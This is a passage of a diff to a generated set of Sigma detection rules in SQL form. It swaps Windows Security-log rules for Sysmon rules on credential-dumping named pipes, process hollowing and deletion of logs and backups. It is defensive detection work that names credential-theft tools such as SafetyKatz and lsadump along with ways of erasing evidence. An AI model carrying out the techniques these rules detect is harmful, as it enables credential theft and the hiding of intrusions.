"attack.privilege_escalation", + "attack.credential_access", + "attack.t1528", + "attack.t1134.001" ], "falsepositives": [ - "The rule doesn't look for anything suspicious so false positives are expected. If you use one of the tools mentioned, comment it out" + "Unlikely" ], - "level": "medium", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND (ServiceFileName LIKE '%SSUService%' ESCAPE '\\' OR ServiceFileName LIKE '%SplashtopRemoteService%' ESCAPE '\\' OR ServiceFileName LIKE '%Atera%' ESCAPE '\\' OR ServiceFileName LIKE '%LogMeIn%' ESCAPE '\\' OR ServiceFileName LIKE '%LMIGuardianSvc%' ESCAPE '\\' OR ServiceFileName LIKE '%TeamViewer%' ESCAPE '\\' OR ServiceFileName LIKE '%RPCService%' ESCAPE '\\' OR ServiceFileName LIKE '%RPCPerformanceService%' ESCAPE '\\' OR ServiceFileName LIKE '%BASupportExpressStandaloneService%' ESCAPE '\\' OR ServiceFileName LIKE '%BASupportExpressSrvcUpdater%' ESCAPE '\\' OR ServiceFileName LIKE '%GoToMyPC%' ESCAPE '\\' OR ServiceFileName LIKE '%monblanking%' ESCAPE '\\' OR ServiceFileName LIKE '%RManService%' ESCAPE '\\' OR ServiceFileName LIKE '%GoToAssist%' ESCAPE '\\' OR ServiceFileName LIKE '%AmmyyAdmin%' ESCAPE '\\' OR ServiceFileName LIKE '%vncserver%' ESCAPE '\\' OR ServiceFileName LIKE '%Parsec%' ESCAPE '\\' OR ServiceFileName LIKE '%chromoting%' ESCAPE '\\' OR ServiceFileName LIKE '%Zoho%' ESCAPE '\\' OR ServiceFileName LIKE '%jumpcloud%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID IN ('17', '18') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (PipeName LIKE '%\\\\imposecost%' ESCAPE '\\' OR PipeName LIKE '%\\\\imposingcost%' ESCAPE '\\'))" ], - "filename": "win_security_service_install_remote_access_software.yml" + "filename": "pipe_created_koh_default_pipe.yml" }, { - "title": "Suspicious Windows ANONYMOUS LOGON Local Account Created", - "id": "1bbf25b9-8038-4154-a50b-118f2a32be27", + "title": "Cred Dump-Tools Named Pipes", + "id": "961d0ba2-3eea-4303-a930-2cf78bbfcc5e", "status": "test", - "description": "Detects the creation of suspicious accounts similar to ANONYMOUS LOGON, such as using additional spaces. Created as an covering detection for exclusion of Logon Type 3 from ANONYMOUS LOGON accounts.", - "author": "James Pemberton / @4A616D6573", + "description": "Detects well-known credential dumping tools execution via specific named pipes", + "author": "Teymur Kheirkhabarov, oscd.community", "tags": [ - "attack.persistence", - "attack.t1136.001", - "attack.t1136.002" + "attack.credential_access", + "attack.t1003.001", + "attack.t1003.002", + "attack.t1003.004", + "attack.t1003.005" ], "falsepositives": [ - "Unknown" + "Legitimate Administrator using tool for password recovery" + ], + "level": "critical", + "rule": [ + "SELECT * FROM logs WHERE (EventID IN ('17', '18') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (PipeName LIKE '%\\\\lsadump%' ESCAPE '\\' OR PipeName LIKE '%\\\\cachedump%' ESCAPE '\\' OR PipeName LIKE '%\\\\wceservicepipe%' ESCAPE '\\'))" + ], + "filename": "pipe_created_cred_dump_tools_named_pipes.yml" + }, + { + "title": "Sysmon Configuration Error", + "id": "815cd91b-7dbc-4247-841a-d7dd1392b0a8", + "status": "experimental", + "description": "Detects when an adversary is trying to hide it's action from Sysmon logging based on error messages", + "author": "frack113", + "tags": [ + "attack.defense_evasion", + "attack.t1564" + ], + "falsepositives": [ + "Legitimate administrative action" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4720' AND SamAccountName LIKE '%ANONYMOUS%' ESCAPE '\\' AND SamAccountName LIKE '%LOGON%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '255' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Description LIKE '%Failed to open service configuration with error%' ESCAPE '\\' OR Description LIKE '%Failed to connect to the driver to update configuration%' ESCAPE '\\') AND NOT ((Description LIKE '%Failed to open service configuration with error%' ESCAPE '\\' AND Description LIKE '%Last error: The media is write protected.%' ESCAPE '\\') OR ((Description LIKE '%Failed to open service configuration with error 19%' ESCAPE '\\' OR Description LIKE '%Failed to open service configuration with error 93%' ESCAPE '\\'))))" ], - "filename": "win_security_susp_local_anon_logon_created.yml" + "filename": "sysmon_config_modification_error.yml" }, { - "title": "Suspicious Access to Sensitive File Extensions", - "id": "91c945bc-2ad1-4799-a591-4d00198a1215", + "title": "Sysmon Configuration Change", + "id": "8ac03a65-6c84-4116-acad-dc1558ff7a77", "status": "test", - "description": "Detects known sensitive file extensions accessed on a network share", - "author": "Samir Bousseaden", + "description": "Detects a Sysmon configuration change, which could be the result of a legitimate reconfiguration or someone trying manipulate the configuration", + "author": "frack113", "tags": [ - "attack.collection", - "attack.t1039" + "attack.defense_evasion" ], "falsepositives": [ - "Help Desk operator doing backup or re-imaging end user machine or backup software", - "Users working with these data types or exchanging message files" + "Legitimate administrative action" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND (RelativeTargetName LIKE '%.pst' ESCAPE '\\' OR RelativeTargetName LIKE '%.ost' ESCAPE '\\' OR RelativeTargetName LIKE '%.msg' ESCAPE '\\' OR RelativeTargetName LIKE '%.nst' ESCAPE '\\' OR RelativeTargetName LIKE '%.oab' ESCAPE '\\' OR RelativeTargetName LIKE '%.edb' ESCAPE '\\' OR RelativeTargetName LIKE '%.nsf' ESCAPE '\\' OR RelativeTargetName LIKE '%.bak' ESCAPE '\\' OR RelativeTargetName LIKE '%.dmp' ESCAPE '\\' OR RelativeTargetName LIKE '%.kirbi' ESCAPE '\\' OR RelativeTargetName LIKE '%\\\\groups.xml' ESCAPE '\\' OR RelativeTargetName LIKE '%.rdp' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventID = '16')" ], - "filename": "win_security_susp_raccess_sensitive_fext.yml" + "filename": "sysmon_config_modification.yml" }, { - "title": "Meterpreter or Cobalt Strike Getsystem Service Installation - Security", - "id": "ecbc5e16-58e0-4521-9c60-eb9a7ea4ad34", - "status": "test", - "description": "Detects the use of getsystem Meterpreter/Cobalt Strike command by detecting a specific service installation", - "author": "Teymur Kheirkhabarov, Ecco, Florian Roth", + "title": "Sysmon Blocked Executable", + "id": "23b71bc5-953e-4971-be4c-c896cda73fc2", + "status": "experimental", + "description": "Triggers on any Sysmon file block executable event. Which should indicates a violation of the block policy set", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.t1134.001", - "attack.t1134.002" + "attack.defense_evasion" ], "falsepositives": [ - "Highly unlikely" + "Unlikely" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ((ServiceFileName LIKE '%cmd%' ESCAPE '\\' AND ServiceFileName LIKE '%/c%' ESCAPE '\\' AND ServiceFileName LIKE '%echo%' ESCAPE '\\' AND ServiceFileName LIKE '%\\\\pipe\\\\%' ESCAPE '\\') OR (ServiceFileName LIKE '%\\%COMSPEC\\%%' ESCAPE '\\' AND ServiceFileName LIKE '%/c%' ESCAPE '\\' AND ServiceFileName LIKE '%echo%' ESCAPE '\\' AND ServiceFileName LIKE '%\\\\pipe\\\\%' ESCAPE '\\') OR (ServiceFileName LIKE '%cmd.exe%' ESCAPE '\\' AND ServiceFileName LIKE '%/c%' ESCAPE '\\' AND ServiceFileName LIKE '%echo%' ESCAPE '\\' AND ServiceFileName LIKE '%\\\\pipe\\\\%' ESCAPE '\\') OR (ServiceFileName LIKE '%rundll32%' ESCAPE '\\' AND ServiceFileName LIKE '%.dll,a%' ESCAPE '\\' AND ServiceFileName LIKE '%/p:%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '27' AND Channel = 'Microsoft-Windows-Sysmon/Operational')" ], - "filename": "win_security_meterpreter_or_cobaltstrike_getsystem_service_install.yml" + "filename": "sysmon_file_block_exe.yml" }, { - "title": "Secure Deletion with SDelete", - "id": "39a80702-d7ca-4a83-b776-525b1f86a36d", - "status": "test", - "description": "Detects renaming of file while deletion with SDelete tool.", - "author": "Thomas Patzke", + "title": "Sysmon Process Hollowing Detection", + "id": "c4b890e5-8d8c-4496-8c66-c805753817cd", + "status": "experimental", + "description": "Detects when a memory process image does not match the disk image, indicative of process hollowing.", + "author": "Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Sittikorn S", "tags": [ - "attack.impact", "attack.defense_evasion", - "attack.t1070.004", - "attack.t1027.005", - "attack.t1485", - "attack.t1553.002", - "attack.s0195" + "attack.privilege_escalation", + "attack.t1055.012" ], "falsepositives": [ - "Legitimate usage of SDelete" + "There are no known false positives at this time" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID IN ('4656', '4663', '4658') AND (ObjectName LIKE '%.AAA' ESCAPE '\\' OR ObjectName LIKE '%.ZZZ' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '25' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Type = 'Image is replaced' AND NOT ((Image LIKE '%:\\\\Program Files\\\\%' ESCAPE '\\' OR Image LIKE '%:\\\\Program Files (x86)%' ESCAPE '\\') AND (Image LIKE '%\\\\chrome.exe' ESCAPE '\\' OR Image LIKE '%\\\\opera.exe' ESCAPE '\\' OR Image LIKE '%\\\\firefox.exe' ESCAPE '\\' OR Image LIKE '%\\\\MicrosoftEdge.exe' ESCAPE '\\' OR Image LIKE '%\\\\WMIADAP.exe' ESCAPE '\\')))" ], - "filename": "win_security_susp_sdelete.yml" + "filename": "sysmon_process_hollowing.yml" }, { - "title": "Disabling Windows Event Auditing", - "id": "69aeb277-f15f-4d2d-b32a-55e883609563", + "title": "Sysmon Configuration Modification", + "id": "1f2b5353-573f-4880-8e33-7d04dcf97744", "status": "test", - "description": "Detects scenarios where system auditing (ie: windows event log auditing) is disabled.\nThis may be used in a scenario where an entity would want to bypass local logging to evade detection when windows event logging is enabled and reviewed.\nAlso, it is recommended to turn off \"Local Group Policy Object Processing\" via GPO, which will make sure that Active Directory GPOs take precedence over local/edited computer policies via something such as \"gpedit.msc\".\nPlease note, that disabling \"Local Group Policy Object Processing\" may cause an issue in scenarios of one off specific GPO modifications -- however it is recommended to perform these modifications in Active Directory anyways.\n", - "author": "@neu5ron", + "description": "Detects when an attacker tries to hide from Sysmon by disabling or stopping it", + "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1562.002" + "attack.t1564" ], "falsepositives": [ - "Unknown" + "Legitimate administrative action" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4719' AND (AuditPolicyChanges LIKE '%\\%\\%8448%' ESCAPE '\\' OR AuditPolicyChanges LIKE '%\\%\\%8450%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID IN ('4', '16') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (State = 'Stopped' OR logs MATCH ('\"Sysmon config state changed\"')) AND NOT (State = 'Started'))" ], - "filename": "win_security_disable_event_logging.yml" + "filename": "sysmon_config_modification_status.yml" }, { - "title": "Add or Remove Computer from DC", - "id": "20d96d95-5a20-4cf1-a483-f3bda8a7c037", + "title": "Prefetch File Deleted", + "id": "0a1f9d29-6465-4776-b091-7f43b26e4c89", "status": "experimental", - "description": "Detects the creation or removal of a computer. Can be used to detect attacks such as DCShadow via the creation of a new SPN.", - "author": "frack113", + "description": "Detects the deletion of a prefetch file which may indicate an attempt to destroy forensic evidence", + "author": "Cedric MAURUGEON", + "tags": [ + "attack.defense_evasion", + "attack.t1070.004" + ], "falsepositives": [ "Unknown" ], - "level": "low", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID IN ('4741', '4743'))" + "SELECT * FROM logs WHERE ((EventID IN ('23', '26') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetFilename LIKE 'C:\\\\Windows\\\\Prefetch\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.pf' ESCAPE '\\') AND NOT (Image LIKE 'C:\\\\windows\\\\system32\\\\svchost.exe' ESCAPE '\\' AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')))" ], - "filename": "win_security_add_remove_computer.yml" + "filename": "file_delete_win_delete_prefetch.yml" }, { - "title": "Failed Code Integrity Checks", - "id": "470ec5fa-7b4e-4071-b200-4c753100f49b", - "status": "stable", - "description": "Detects code integrity failures such as missing page hashes or corrupted drivers due unauthorized modification. This could be a sign of tampered binaries.", - "author": "Thomas Patzke", + "title": "PowerShell Console History Logs Deleted", + "id": "ff301988-c231-4bd0-834c-ac9d73b86586", + "status": "experimental", + "description": "Detects the deletion of the PowerShell console History logs which may indicate an attempt to destroy forensic evidence", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1027.001" + "attack.t1070" ], "falsepositives": [ - "Disk device errors" + "Unknown" ], - "level": "low", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID IN ('5038', '6281'))" + "SELECT * FROM logs WHERE (EventID IN ('23', '26') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%\\\\PSReadLine\\\\ConsoleHost\\_history.txt' ESCAPE '\\')" ], - "filename": "win_security_susp_codeintegrity_check_failure.yml" + "filename": "file_delete_win_delete_powershell_command_history.yml" }, { - "title": "Metasploit Or Impacket Service Installation Via SMB PsExec", - "id": "6fb63b40-e02a-403e-9ffd-3bcc1d749442", + "title": "IIS WebServer Access Logs Deleted", + "id": "3eb8c339-a765-48cc-a150-4364c04652bf", "status": "experimental", - "description": "Detects usage of Metasploit SMB PsExec (exploit/windows/smb/psexec) and Impacket psexec.py by triggering on specific service installation", - "author": "Bartlomiej Czyz, Relativity", + "description": "Detects the deletion of IIS WebServer access logs which may indicate an attempt to destroy forensic evidence", + "author": "Tim Rauch (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.t1021.002", - "attack.t1570", - "attack.execution", - "attack.t1569.002" + "attack.defense_evasion", + "attack.t1070" ], "falsepositives": [ - "Possible, different agents with a 8 character binary and a 4, 8 or 16 character service name" + "During uninstallation of the IIS service", + "During log rotation" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4697' AND ServiceFileName REGEXP '^%systemroot%\\\\[a-zA-Z]{8}\\.exe$' AND ServiceName REGEXP '(^[a-zA-Z]{4}$)|(^[a-zA-Z]{8}$)|(^[a-zA-Z]{16}$)' AND ServiceStartType = '3' AND ServiceType = '0x10') AND NOT (ServiceName = 'PSEXESVC'))" + "SELECT * FROM logs WHERE (EventID IN ('23', '26') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%\\\\inetpub\\\\logs\\\\LogFiles\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.log' ESCAPE '\\')" ], - "filename": "win_security_metasploit_or_impacket_smb_psexec_service_install.yml" + "filename": "file_delete_win_delete_iis_access_logs.yml" }, { - "title": "Scheduled Task Deletion", - "id": "4f86b304-3e02-40e3-aa5d-e88a167c9617", + "title": "Potential PrintNightmare Exploitation Attempt", + "id": "5b2bbc47-dead-4ef7-8908-0cf73fcbecbf", "status": "experimental", - "description": "Detects scheduled task deletion events. Scheduled tasks are likely to be deleted if not used for persistence. Malicious Software often creates tasks directly under the root node e.g. \\TASKNAME", - "author": "David Strassegger, Tim Shelton", + "description": "Detect DLL deletions from Spooler Service driver folder. This might be a potential exploitation attempt of CVE-2021-1675", + "author": "Bhabesh Raj", "tags": [ - "attack.execution", + "attack.persistence", + "attack.defense_evasion", "attack.privilege_escalation", - "car.2013-08-001", - "attack.t1053.005" + "attack.t1574", + "cve.2021.1675" ], "falsepositives": [ - "Software installation" + "Unknown" ], - "level": "low", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4699' AND NOT ((TaskName LIKE '\\\\Microsoft\\\\Windows\\\\RemovalTools\\\\MRT\\_ERROR\\_HB' ESCAPE '\\') OR (TaskName LIKE '%\\\\Mozilla\\\\Firefox Default Browser Agent %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID IN ('23', '26') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\spoolsv.exe' ESCAPE '\\' AND TargetFilename LIKE '%C:\\\\Windows\\\\System32\\\\spool\\\\drivers\\\\x64\\\\3\\\\%' ESCAPE '\\')" ], - "filename": "win_security_scheduled_task_deletion.yml" + "filename": "file_delete_win_cve_2021_1675_print_nightmare.yml" }, { - "title": "Suspicious LDAP-Attributes Used", - "id": "d00a9a72-2c09-4459-ad03-5e0a23351e36", + "title": "TeamViewer Log File Deleted", + "id": "b1decb61-ed83-4339-8e95-53ea51901720", "status": "test", - "description": "Detects the usage of particular AttributeLDAPDisplayNames, which are known for data exchange via LDAP by the tool LDAPFragger and are additionally not commonly used in companies.", - "author": "xknow @xknow_infosec", + "description": "Detects the deletion of the TeamViewer log files which may indicate an attempt to destroy forensic evidence", + "author": "frack113", "tags": [ - "attack.t1001.003", - "attack.command_and_control" + "attack.defense_evasion", + "attack.t1070.004" ], "falsepositives": [ - "Companies, who may use these default LDAP-Attributes for personal information" + "Unknown" ], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5136' AND AttributeValue LIKE '%' ESCAPE '\\' AND AttributeLDAPDisplayName IN ('primaryInternationalISDNNumber', 'otherFacsimileTelephoneNumber', 'primaryTelexNumber'))" + "SELECT * FROM logs WHERE ((EventID IN ('23', '26') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetFilename LIKE '%\\\\TeamViewer\\_%' ESCAPE '\\' AND TargetFilename LIKE '%.log' ESCAPE '\\') AND NOT (Image LIKE 'C:\\\\Windows\\\\system32\\\\svchost.exe' ESCAPE '\\'))" ], - "filename": "win_security_susp_ldap_dataexchange.yml" + "filename": "file_delete_win_delete_teamviewer_logs.yml" }, { - "title": "Malicious Service Installations", - "id": "cb062102-587e-4414-8efa-dbe3c7bf19c6", - "status": "test", - "description": "Detects known malicious service installs that only appear in cases of lateral movement, credential dumping, and other suspicious activities.", - "author": "Florian Roth (Nextron Systems), Daniil Yugoslavskiy, oscd.community (update)", + "title": "Unusual File Deletion by Dns.exe", + "id": "8f0b1fb1-9bd4-4e74-8cdf-a8de4d2adfd0", + "status": "experimental", + "description": "Detects an unexpected file being deleted by dns.exe which my indicate activity related to remote code execution or other forms of exploitation as seen in CVE-2020-1350 (SigRed)", + "author": "Tim Rauch (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.t1003", - "car.2013-09-005", - "attack.t1543.003", - "attack.t1569.002" + "attack.initial_access", + "attack.t1133" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceName = 'javamtsup')" + "SELECT * FROM logs WHERE ((EventID IN ('23', '26') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Image LIKE '%\\\\dns.exe' ESCAPE '\\' AND NOT (TargetFilename LIKE '%\\\\dns.log' ESCAPE '\\'))" ], - "filename": "win_security_mal_service_installs.yml" + "filename": "file_delete_win_unusual_deletion_by_dns_exe.yml" }, { - "title": "Suspicious Kerberos RC4 Ticket Encryption", - "id": "496a0e47-0a33-4dca-b009-9e6ca3591f39", + "title": "Backup Files Deleted", + "id": "06125661-3814-4e03-bfa2-1e4411c60ac3", "status": "experimental", - "description": "Detects service ticket requests using RC4 encryption type", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects deletion of files with extensions often used for backup files. Adversaries may delete or remove built-in operating system data and turn off services designed to aid in the recovery of a corrupted system to prevent recovery.", + "author": "frack113", "tags": [ - "attack.credential_access", - "attack.t1558.003" + "attack.impact", + "attack.t1490" ], "falsepositives": [ - "Service accounts used on legacy systems (e.g. NetApp)", - "Windows Domains with DFL 2003 and legacy systems" + "Legitime usage" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4769' AND TicketOptions = '0x40810000' AND TicketEncryptionType = '0x17') AND NOT (ServiceName LIKE '%$' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID IN ('23', '26') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\wt.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\') AND (TargetFilename LIKE '%.VHD' ESCAPE '\\' OR TargetFilename LIKE '%.bac' ESCAPE '\\' OR TargetFilename LIKE '%.bak' ESCAPE '\\' OR TargetFilename LIKE '%.wbcat' ESCAPE '\\' OR TargetFilename LIKE '%.bkf' ESCAPE '\\' OR TargetFilename LIKE '%.set' ESCAPE '\\' OR TargetFilename LIKE '%.win' ESCAPE '\\' OR TargetFilename LIKE '%.dsk' ESCAPE '\\'))" ], - "filename": "win_security_susp_rc4_kerberos.yml" + "filename": "file_delete_win_delete_backup_file.yml" }, { - "title": "Remote Task Creation via ATSVC Named Pipe", - "id": "f6de6525-4509-495a-8a82-1f8b0ed73a00", - "status": "test", - "description": "Detects remote task creation via at.exe or API interacting with ATSVC namedpipe", - "author": "Samir Bousseaden", + "title": "Exchange PowerShell Cmdlet History Deleted", + "id": "a55349d8-9588-4c5a-8e3b-1925fe2a4ffe", + "status": "experimental", + "description": "Detects the deletion of the Exchange PowerShell cmdlet History logs which may indicate an attempt to destroy forensic evidence", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.persistence", - "car.2013-05-004", - "car.2015-04-001", - "attack.t1053.002" + "attack.defense_evasion", + "attack.t1070" ], "falsepositives": [ - "Unknown" + "Possible FP during log rotation" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND ShareName LIKE '\\\\\\\\\\*\\\\IPC$' ESCAPE '\\' AND RelativeTargetName = 'atsvc' AND Accesses LIKE '%WriteData%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID IN ('23', '26') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '\\\\Logging\\\\CmdletInfra\\\\LocalPowerShell\\\\Cmdlet\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\_Cmdlet\\_%' ESCAPE '\\')" ], - "filename": "win_security_atsvc_task.yml" + "filename": "file_delete_win_delete_exchange_powershell_logs.yml" }, { - "title": "AD Object WriteDAC Access", - "id": "028c7842-4243-41cd-be6f-12f3cf1a26c7", + "title": "File Deleted Via Sysinternals SDelete", + "id": "6ddab845-b1b8-49c2-bbf7-1a11967f64bc", "status": "test", - "description": "Detects WRITE_DAC access to a domain object", - "author": "Roberto Rodriguez @Cyb3rWard0g", + "description": "Detects the deletion of files by the Sysinternals SDelete utility. It looks for the common name pattern used to rename files.", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ "attack.defense_evasion", - "attack.t1222.001" + "attack.t1070.004" ], "falsepositives": [ - "Unknown" + "Legitime usage of SDelete" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4662' AND ObjectServer = 'DS' AND AccessMask = '0x40000' AND ObjectType IN ('19195a5b-6da0-11d0-afd3-00c04fd930c9', 'domainDNS'))" + "SELECT * FROM logs WHERE ((EventID IN ('23', '26') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetFilename LIKE '%.AAA' ESCAPE '\\' OR TargetFilename LIKE '%.ZZZ' ESCAPE '\\') AND NOT ((TargetFilename LIKE '%\\\\Wireshark\\\\radius\\\\dictionary.alcatel-lucent.aaa' ESCAPE '\\')))" ], - "filename": "win_security_ad_object_writedac_access.yml" + "filename": "file_delete_win_sysinternals_sdelete_file_deletion.yml" }, { - "title": "Suspicious Teams Application Related ObjectAcess Event", - "id": "25cde13e-8e20-4c29-b949-4e795b76f16f", + "title": "EventLog EVTX File Deleted", + "id": "63c779ba-f638-40a0-a593-ddd45e8b1ddc", "status": "experimental", - "description": "Detects an access to authentication tokens and accounts of Microsoft Teams desktop application.", - "author": "@SerkinValery", + "description": "Detects the deletion of the event log files which may indicate an attempt to destroy forensic evidence", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1528" + "attack.defense_evasion", + "attack.t1070" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4663' AND (ObjectName LIKE '%\\\\Microsoft\\\\Teams\\\\Cookies%' ESCAPE '\\' OR ObjectName LIKE '%\\\\Microsoft\\\\Teams\\\\Local Storage\\\\leveldb%' ESCAPE '\\')) AND NOT (ProcessName LIKE '%\\\\Microsoft\\\\Teams\\\\current\\\\Teams.exe%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID IN ('23', '26') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\winevt\\\\Logs\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.evtx' ESCAPE '\\')" ], - "filename": "win_security_teams_suspicious_objectaccess.yml" + "filename": "file_delete_win_delete_event_log_files.yml" }, { - "title": "Remote Service Activity via SVCCTL Named Pipe", - "id": "586a8d6b-6bfe-4ad9-9d78-888cd2fe50c3", - "status": "test", - "description": "Detects remote service activity via remote access to the svcctl named pipe", - "author": "Samir Bousseaden", + "title": "Tomcat WebServer Logs Deleted", + "id": "270185ff-5f50-4d6d-a27f-24c3b8c9fef8", + "status": "experimental", + "description": "Detects the deletion of tomcat WebServer logs which may indicate an attempt to destroy forensic evidence", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.persistence", - "attack.t1021.002" + "attack.defense_evasion", + "attack.t1070" ], "falsepositives": [ - "Unknown" + "During uninstallation of the tomcat server", + "During log rotation" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND ShareName LIKE '\\\\\\\\\\*\\\\IPC$' ESCAPE '\\' AND RelativeTargetName = 'svcctl' AND Accesses LIKE '%WriteData%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID IN ('23', '26') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%\\\\Tomcat%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\logs\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%catalina.%' ESCAPE '\\' OR TargetFilename LIKE '%\\_access\\_log.%' ESCAPE '\\' OR TargetFilename LIKE '%localhost.%' ESCAPE '\\'))" ], - "filename": "win_security_svcctl_remote_service.yml" + "filename": "file_delete_win_delete_tomcat_logs.yml" }, { - "title": "Metasploit SMB Authentication", - "id": "72124974-a68b-4366-b990-d30e0b2a190d", - "status": "test", - "description": "Alerts on Metasploit host's authentications on the domain.", - "author": "Chakib Gzenayi (@Chak092), Hosni Mribah", + "title": "Potential Persistence Via Outlook Form", + "id": "c3edc6a5-d9d4-48d8-930e-aab518390917", + "status": "experimental", + "description": "Detects the creation of a new Outlook form which can contain malicious code", + "author": "Tobias Michalski (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.t1021.002" + "attack.persistence", + "attack.t1137.003" ], "falsepositives": [ - "Linux hostnames composed of 16 characters." + "Legitimate use of outlook forms" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID IN ('4625', '4624') AND LogonType = '3' AND AuthenticationPackageName = 'NTLM' AND WorkstationName REGEXP '^[A-Za-z0-9]{16}$') OR (ProcessName = '' AND EventID = '4776' AND Workstation REGEXP '^[A-Za-z0-9]{16}$')))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\outlook.exe' ESCAPE '\\' AND (TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\FORMS\\\\IPM%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Local Settings\\\\Application Data\\\\Microsoft\\\\Forms%' ESCAPE '\\'))" ], - "filename": "win_security_metasploit_authentication.yml" + "filename": "file_event_win_office_outlook_newform.yml" }, { - "title": "Impacket PsExec Execution", - "id": "32d56ea1-417f-44ff-822b-882873f5f43b", + "title": "SafetyKatz Default Dump Filename", + "id": "e074832a-eada-4fd7-94a1-10642b130e16", "status": "test", - "description": "Detects execution of Impacket's psexec.py.", - "author": "Bhabesh Raj", + "description": "Detects default lsass dump filename from SafetyKatz", + "author": "Markus Neis", "tags": [ - "attack.lateral_movement", - "attack.t1021.002" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ - "Unknown" + "Rare legitimate files with similar filename structure" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND ShareName LIKE '\\\\\\\\\\*\\\\IPC$' ESCAPE '\\' AND (RelativeTargetName LIKE 